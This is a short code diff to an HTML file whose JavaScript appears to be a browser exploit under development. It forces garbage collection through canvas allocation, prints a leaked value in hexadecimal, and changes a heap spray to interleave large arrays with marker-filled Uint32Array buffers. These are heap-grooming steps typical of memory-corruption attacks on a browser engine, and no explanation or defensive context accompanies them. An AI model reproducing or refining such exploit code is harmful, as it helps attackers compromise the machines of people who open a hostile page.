--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start1");
+alert("start2");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -64,11 +64,15 @@ x.replace(/\d/g, s1);
 alert("ok");
 alert(arrcvs[0].toString(16));
 var spray=new Array(0x800);
-for(var i=0;i<spray.length;i++){
+for(var i=0;i<spray.length;i+=2){
  spray[i]=new Array(0x1e00);
+ spray[i+1]=new Uint32Array(0x10000/4);
+ for(var j=0;j<0x10000/4;j++){
+  spray[i+1][j]=i;   
+ }
  for(var j=0;j<0x1e00;j+=2){
   spray[i][j]=arrcvs;
-  spray[i][j+1]=0x6666;
+  spray[i][j+1]=i;
  }
 }
 var a=0;
